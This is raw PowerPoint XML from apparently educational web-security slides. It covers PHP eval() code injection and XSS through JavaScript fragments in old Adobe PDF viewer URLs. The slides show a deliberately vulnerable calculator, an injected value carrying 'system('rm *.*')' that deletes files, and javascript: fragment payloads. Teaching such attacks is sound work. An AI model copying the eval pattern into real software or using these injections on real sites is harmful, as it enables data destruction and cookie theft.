              <a:t>Server-side PHP calculator at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$in = $_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval('$op1 = ' . $in . ';'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88C9AB3C-AA5B-5049-8D45-33981CDD1D7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4157801" y="2649673"/>
            <a:ext cx="2829853" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Value of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>” parameter taken from the URL and used as part of a system command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1F60C2-971C-044F-B38C-6972FB932A30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="4027932"/>
            <a:ext cx="4955203" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good user calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calc.php?val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14493B2-161E-5E45-A901-7549142F5681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066799" y="4575194"/>
            <a:ext cx="6484467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Evil user calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calc.php?val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 ; system('rm *.*') </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E79909F2-45FE-7648-B164-556249FB3AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6811321" y="4205862"/>
            <a:ext cx="1508746" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL-encoded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37FFB73B-0DF8-A84C-9125-D605F626AC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1105467" y="5199795"/>
            <a:ext cx="5147563" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>calc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> executes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval(‘$op1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5; system('rm *.*')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79626869-5014-714C-881B-390AF9229839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3067732" y="2766493"/>
            <a:ext cx="103320" cy="304200"/>
            <a:chOff x="3067732" y="2766493"/>
            <a:chExt cx="103320" cy="30420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40283B46-43FC-434C-8F36-D0CC3C5C4535}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3067732" y="2766493"/>
                <a:ext cx="101160" cy="279720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40283B46-43FC-434C-8F36-D0CC3C5C4535}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3049732" y="2748493"/>
                  <a:ext cx="1368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287C6156-6E1C-9E41-919F-9D70C5CAFA04}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3086812" y="3058093"/>
                <a:ext cx="84240" cy="12600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="18" name="Ink 17">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{287C6156-6E1C-9E41-919F-9D70C5CAFA04}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3069172" y="3040093"/>
                  <a:ext cx="119880" cy="4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F334407-A192-A944-A838-3CC9A4D18171}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5795092" y="4507813"/>
              <a:ext cx="1635480" cy="590760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="Ink 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F334407-A192-A944-A838-3CC9A4D18171}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5777452" y="4490173"/>
                <a:ext cx="1671120" cy="626400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232307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6"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342C36E9-9D87-5548-B43B-C91C17B1473F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Adobe PDF Viewer  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>(before version 7.9)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66E8710A-DD1C-2B46-8973-B38F298C1D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>PDF documents execute JavaScript code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>http://path/to/pdf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>file.pdf#whatever_name_you_want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>code_here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>The “origin” of this injected code is the domain where PDF file is hosted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4127013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2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E1418F-A274-4546-8D87-547887739205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="10451910" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker locates a PDF file hosted on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker creates a URL pointing to the PDF, with JavaScript malware in the fragment portion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/path/to/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>file.pdf#s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript:malcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker entices a victim to click on the link </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>If the victim has Adobe Acrobat Reader Plugin 7.0.x or less, malware executes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Its “origin” is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, so it can change content, steal cookies from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74756" name="Title 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54718579-5679-D44A-9E6B-F99F58C993FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>XSS Against PDF Viewer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1245450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E054343-FB89-414C-8574-B8C3181625D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Not Scary Enough?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD887F1-2DAF-F04E-AF18-6A04CAFC3031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>PDF files on the local filesystem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ENUtxt.pdf#blah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>("XSS");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>JavaScript malware now runs outside sandbox with the ability to read and write local files ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1854033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76804" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5BFC1A-3B12-4944-92A5-7AD0AB7F4D2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676240" y="875324"/>
            <a:ext cx="3536510" cy="5093520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where Malicious Scripts Lurk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05B8B20-893B-F146-A6B2-676C8A9C0BA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478124" y="559477"/>
            <a:ext cx="5647076" cy="5475563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User-created content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Social sites, blogs, forums, wikis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>When visitor loads the page, website displays the content and visitor’s browser executes the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Many sites try to filter out scripts from user content, but this is difficult!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3AFEC47-05E4-FB4E-BB7B-05CFB1450E17}"/>
